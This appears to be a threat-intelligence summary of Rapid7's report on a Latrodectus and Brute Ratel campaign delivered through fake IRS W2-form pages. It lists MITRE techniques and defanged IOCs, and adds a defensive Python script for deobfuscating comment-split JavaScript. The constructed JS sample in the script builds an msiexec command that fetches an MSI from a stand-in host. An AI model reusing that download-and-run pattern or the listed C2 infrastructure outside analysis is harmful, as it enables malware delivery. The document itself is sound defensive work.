Rapid7 outlines a campaign that hijacks W2-form searches via Bing, directing victims to a fake IRS site that downloads a malicious JavaScript file. The chain then drops Brute Ratel Badger, loads Latrodectus, and establishes C2 communications to execute additional payloads. #Latrodectus #BruteRatelBadger
Keypoints
- The campaign targets users searching for W2 forms using Bing, redirecting to a spoofed site to download malicious content.
- A CAPTCHA on the fake IRS site is used to entice interaction and trigger the download of a JavaScript file.
- The JavaScript file ultimately downloads and executes an MSI package, which drops a DLL containing Brute Ratel Badger.
- Brute Ratel Badger acts as a stager to download and inject Latrodectus, a stealthy backdoor for information gathering and command execution.
- Latrodectus then communicates with hard-coded Brute Ratel C2 domains and later loads additional payloads onto the host.
- Attackers embed valid Authenticode certificates and obfuscate code to evade detection and prolong persistence.
MITRE Techniques
- [T1608.006] SEO Poisoning – ‘Threat Actor employed SEO poisoning, ensuring their advertisement was listed first in search results’.
- [T1189] Drive-by Compromise – ‘Upon successfully solving CAPTCHA, browser is directed to download a JavaScript file from another URL’.
- [T1059.007] Command and Scripting Interpreter: JavaScript – ‘User executes the downloaded JavaScript file’.
- [T1027.009] Embedded Payloads – ‘Brute Ratel payload is embedded within decrypted payload’.
- [T1027.010] Command Obfuscation – ‘Downloaded JavaScript file contains commands broken up by commented lines to hinder analysis and anti-virus scanners’.
- [T1027.013] Encrypted/Encoded File – ‘Latrodectus employs string decryption to hinder detection and analysis’.
- [T1140] Deobfuscate/Decode Files or Information – ‘DLL dropped by MSI package contains XOR routine to decrypt the Brute Ratel payload’.
- [T1055.001] Dynamic-link Library Injection – ‘Latrodectus DLLs are injected into the Explorer.exe process’.
- [T1071.001] Web Protocols – ‘Brute Ratel and Latrodectus communicate with their C2 servers using HTTPS’.
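The comment-splitting noted under T1027.010 is cheap to undo during triage. The normalizer below is an added example (not code from the Rapid7 post or from the campaign's Form_Ver-14-00-21.js): it strips JavaScript comments without touching string literals, folds the `"a" + "b"` fragments back together, and then pulls out any URL that the splitting had hidden. The JavaScript sample and the `example.invalid` host are constructed for the demonstration.

```python
import re

def strip_js_comments(src: str) -> str:
    """Drop // and /* */ comments but keep string literals intact, so a
    comment marker that is really data (the // in "https://") survives.
    Regex literals are not modelled; a '//' inside one would be cut."""
    out, i, n = [], 0, len(src)
    while i < n:
        ch = src[i]
        if ch in ('"', "'"):
            j = i + 1
            while j < n and src[j] != ch:
                j += 2 if src[j] == "\\" else 1   # skip escaped characters
            out.append(src[i:j + 1])
            i = j + 1
        elif src.startswith("//", i):
            j = src.find("\n", i)
            i = n if j == -1 else j               # keep the newline itself
        elif src.startswith("/*", i):
            j = src.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)

_CONCAT = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"')

def merge_string_concat(src: str) -> str:
    """Fold "ab" + "cd" into "abcd" (double-quoted literals) until stable."""
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
    return src

def normalize_js(src: str) -> str:
    """Comment removal, fragment folding, then drop the blank lines left behind."""
    folded = merge_string_concat(strip_js_comments(src))
    return "\n".join(l.strip() for l in folded.splitlines() if l.strip())

_URL = re.compile(r'https?://[^\s"\']+')

def extract_urls(js: str) -> list:
    """URLs visible in the given source; on the raw obfuscated input the
    host is split across fragments and nothing is found."""
    return _URL.findall(js)

# Constructed sample mimicking the comment-split layout; not the real dropper.
SAMPLE_JS = '''
var cmd = "msi" + // filler line inserted between fragments
    "exec /i " + /* more filler */ "https://" +
    // the staging host is split too
    "example.invalid/BST.msi";
'''
```

Run `extract_urls` on the raw sample and on `normalize_js(SAMPLE_JS)` to see the difference a pass of normalization makes before signature matching.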
Indicators of Compromise
- [File Hash] Form_Ver-14-00-21.js – F8121922AE3A189FBAE0B17C8F5E665E29E2E13B2E7144DABA4B382432B4949E (JS downloaded from a Google Firebase URL).
- [File Hash] BST.msi – 5b18441926e832038099acbe4a90c9e1907c9487ac14bdf4925ac170dddc24b6 (MSI downloaded from BST.msi URL).
- [File Hash] neuro.msi – D71BFAB9CCA5DF6A28E12BA51FE5EAF0F9151514B3FD363264513347A8C5CF3A (MSI downloaded from neuro.msi URL).
- [Domain] appointopia[.]com – redirects to grupotefex[.]com/forms-pubs/about-form-w-2/.
- [IP] 85.208.108[.]63, 193.32.177[.]192 – hosts for BST.msi and vpn.msi respectively.
- [Domain] kurvabbr[.]pw, barsman[.]biz, bibidj[.]biz, garunt[.]biz – Brute Ratel C2 domains.
- [Domain] meakdgahup[.]com/live/, riscoarchez[.]com/live/, jucemaster[.]space/live/, finjuiceer[.]com/live/, trymeakafr[.]com/live/ – Latrodectus C2.
Read more: https://blog.rapid7.com/2024/07/24/malware-campaign-lures-users-with-fake-w2-form/